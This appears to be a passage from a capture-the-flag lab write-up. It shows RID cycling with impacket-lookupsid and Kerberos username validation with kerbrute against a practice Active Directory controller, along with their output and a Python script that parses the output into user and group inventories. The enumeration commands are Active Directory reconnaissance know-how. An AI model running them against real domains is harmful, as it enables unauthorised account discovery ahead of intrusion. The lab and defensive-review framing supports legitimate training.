RID Cycling


┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ impacket-lookupsid timelapse.htb/blahblah@dc01.timelapse.htb 100000
Impacket v0.11.0 - Copyright 2023 Fortra
 
password:
[*] Brute forcing SIDs at dc01.timelapse.htb
[*] stringbinding ncacn_np:dc01.timelapse.htb[\pipe\lsarpc]
[*] domain sid is: S-1-5-21-671920749-559770252-3318990721
498: TIMELAPSE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: TIMELAPSE\Administrator (SidTypeUser)
501: TIMELAPSE\Guest (SidTypeUser)
502: TIMELAPSE\krbtgt (SidTypeUser)
512: TIMELAPSE\Domain Admins (SidTypeGroup)
513: TIMELAPSE\Domain Users (SidTypeGroup)
514: TIMELAPSE\Domain Guests (SidTypeGroup)
515: TIMELAPSE\Domain Computers (SidTypeGroup)
516: TIMELAPSE\Domain Controllers (SidTypeGroup)
517: TIMELAPSE\Cert Publishers (SidTypeAlias)
518: TIMELAPSE\Schema Admins (SidTypeGroup)
519: TIMELAPSE\Enterprise Admins (SidTypeGroup)
520: TIMELAPSE\Group Policy Creator Owners (SidTypeGroup)
521: TIMELAPSE\Read-only Domain Controllers (SidTypeGroup)
522: TIMELAPSE\Cloneable Domain Controllers (SidTypeGroup)
525: TIMELAPSE\Protected Users (SidTypeGroup)
526: TIMELAPSE\Key Admins (SidTypeGroup)
527: TIMELAPSE\Enterprise Key Admins (SidTypeGroup)
553: TIMELAPSE\RAS and IAS Servers (SidTypeAlias)
571: TIMELAPSE\Allowed RODC Password Replication Group (SidTypeAlias)
572: TIMELAPSE\Denied RODC Password Replication Group (SidTypeAlias)
1000: TIMELAPSE\DC01$ (SidTypeUser)
1101: TIMELAPSE\DnsAdmins (SidTypeAlias)
1102: TIMELAPSE\DnsUpdateProxy (SidTypeGroup)
1601: TIMELAPSE\thecybergeek (SidTypeUser)
1602: TIMELAPSE\payl0ad (SidTypeUser)
1603: TIMELAPSE\legacyy (SidTypeUser)
1604: TIMELAPSE\sinfulz (SidTypeUser)
1605: TIMELAPSE\babywyrm (SidTypeUser)
1606: TIMELAPSE\DB01$ (SidTypeUser)
1607: TIMELAPSE\WEB01$ (SidTypeUser)
1608: TIMELAPSE\DEV01$ (SidTypeUser)
2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
3101: TIMELAPSE\Development (SidTypeGroup)
3102: TIMELAPSE\HelpDesk (SidTypeGroup)
3103: TIMELAPSE\svc_deploy (SidTypeUser)
5101: TIMELAPSE\TRX (SidTypeUser)

Performing the RID cycling attack with an arbitrary credential, blahblah, against the target SMB service. lookupsid walks RIDs through the LSARPC named pipe (\pipe\lsarpc) over SMB and resolves each SID to a name; since the credential supplied here is made up and no password was given, the fact that the lookups succeed shows that the DC answers SID-to-name queries without valid credentials.

Domain Users


The found domain users have been saved into a file, users.txt. Additionally, some of them appear to be machine accounts: the names ending in $ (DC01$, DB01$, WEB01$ and DEV01$).

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ kerbrute userenum --dc dc01.timelapse.htb -d TIMELAPSE.HTB ./users.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 10/24/23 - Ronnie Flathers @ropnop
 
2023/10/24 17:48:39 >  Using KDC(s):
2023/10/24 17:48:39 >  	dc01.timelapse.htb:88
 
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 Administrator@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 DC01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 legacyy@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 DB01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 WEB01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 payl0ad@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 sinfulz@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 babywyrm@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 Guest@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 thecybergeek@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 svc_deploy@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 TRX@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:	 DEV01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  Done! Tested 13 usernames (13 valid) in 0.415 seconds

All 13 domain users are confirmed to be valid

Domain Group


The following are the non-default domain groups (their RIDs, 2601, 3101 and 3102, lie above the range used by the domain's built-in objects):

  • LAPS_Readers
  • Development
  • HelpDesk
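
As an added example (not part of this writeup, and not Impacket's or Kerbrute's own code), the script below parses lookupsid output into the same inventory built by hand above: the SidTypeUser names that make up users.txt, the machine accounts among them, and the groups whose RIDs fall outside the built-in range, and then cross-checks the user list against kerbrute's VALID USERNAME lines. The embedded samples are trimmed from the two outputs shown above; the helper names and the ROLE_CREATED_GROUPS set are my own assumptions.

```python
"""Turn impacket-lookupsid and kerbrute output into a user/group inventory.

Added example for this writeup; not Impacket's or Kerbrute's own code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample trimmed from the lookupsid output in the writeup (not a live query).
LOOKUPSID_OUTPUT = r"""
[*] Brute forcing SIDs at dc01.timelapse.htb
[*] domain sid is: S-1-5-21-671920749-559770252-3318990721
500: TIMELAPSE\Administrator (SidTypeUser)
501: TIMELAPSE\Guest (SidTypeUser)
512: TIMELAPSE\Domain Admins (SidTypeGroup)
517: TIMELAPSE\Cert Publishers (SidTypeAlias)
1000: TIMELAPSE\DC01$ (SidTypeUser)
1101: TIMELAPSE\DnsAdmins (SidTypeAlias)
1102: TIMELAPSE\DnsUpdateProxy (SidTypeGroup)
1601: TIMELAPSE\thecybergeek (SidTypeUser)
1603: TIMELAPSE\legacyy (SidTypeUser)
1606: TIMELAPSE\DB01$ (SidTypeUser)
2601: TIMELAPSE\LAPS_Readers (SidTypeGroup)
3101: TIMELAPSE\Development (SidTypeGroup)
3102: TIMELAPSE\HelpDesk (SidTypeGroup)
3103: TIMELAPSE\svc_deploy (SidTypeUser)
5101: TIMELAPSE\TRX (SidTypeUser)
"""

# Sample trimmed from the kerbrute output in the writeup (not a live run).
KERBRUTE_OUTPUT = """
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t Administrator@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t DC01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t legacyy@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t DB01$@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t Guest@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t thecybergeek@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t svc_deploy@TIMELAPSE.HTB
2023/10/24 17:48:39 >  [+] VALID USERNAME:\t TRX@TIMELAPSE.HTB
"""

ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")
DOMAIN_SID_RE = re.compile(r"domain sid is: (S-1-5-21-\d+-\d+-\d+)")
VALID_RE = re.compile(r"VALID USERNAME:\s+([^@\s]+)@(\S+)")

# RIDs below 1000 belong to principals created with the domain itself. These
# two sit above 1000 but are created by the DNS server role, not by an admin,
# so they are excluded from the "custom" list (assumption for this example).
ROLE_CREATED_GROUPS = {"DnsAdmins", "DnsUpdateProxy"}


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str

    @property
    def is_machine_account(self) -> bool:
        # Computer accounts are user objects whose sAMAccountName ends in "$".
        return self.sid_type == "SidTypeUser" and self.name.endswith("$")

    @property
    def is_group(self) -> bool:
        return self.sid_type in ("SidTypeGroup", "SidTypeAlias")


def parse_lookupsid(text: str) -> list[SidEntry]:
    """Parse 'RID: DOMAIN\\name (SidTypeX)' lines; banner lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line.strip())
        if m:
            entries.append(SidEntry(int(m[1]), m[2], m[3], m[4]))
    return entries


def domain_sid(text: str) -> str:
    m = DOMAIN_SID_RE.search(text)
    return m[1] if m else ""


def user_list(entries: list[SidEntry]) -> list[str]:
    """Every SidTypeUser name in RID order: the contents of users.txt."""
    return [e.name for e in entries if e.sid_type == "SidTypeUser"]


def machine_accounts(entries: list[SidEntry]) -> list[str]:
    return [e.name for e in entries if e.is_machine_account]


def custom_groups(entries: list[SidEntry]) -> list[str]:
    """Groups/aliases outside the built-in RID range, minus role-created ones."""
    return [e.name for e in entries
            if e.is_group and e.rid >= 1000 and e.name not in ROLE_CREATED_GROUPS]


def parse_kerbrute_valid(text: str) -> set[str]:
    """Usernames kerbrute reported as VALID, casefolded (AD names are case-insensitive)."""
    return {m[1].casefold() for m in VALID_RE.finditer(text)}


def unconfirmed_users(entries: list[SidEntry], kerbrute_text: str) -> list[str]:
    """Names from lookupsid that kerbrute did not confirm as valid principals."""
    valid = parse_kerbrute_valid(kerbrute_text)
    return [u for u in user_list(entries) if u.casefold() not in valid]


if __name__ == "__main__":
    found = parse_lookupsid(LOOKUPSID_OUTPUT)
    print("domain SID:", domain_sid(LOOKUPSID_OUTPUT))
    print("users.txt:", user_list(found))
    print("machine accounts:", machine_accounts(found))
    print("custom groups:", custom_groups(found))
    print("not confirmed by kerbrute:", unconfirmed_users(found, KERBRUTE_OUTPUT))
```

Run it as-is to see the inventory for the trimmed sample; to use it on a real run, paste the full lookupsid and kerbrute output into the two constants (or read them from the files you saved). The cross-check is the useful part for a defender reviewing the same data: any account that lookupsid enumerates but the KDC does not confirm is worth a second look, and the custom-group list is exactly the set (LAPS_Readers, Development, HelpDesk) whose membership and purpose an administrator should be able to explain.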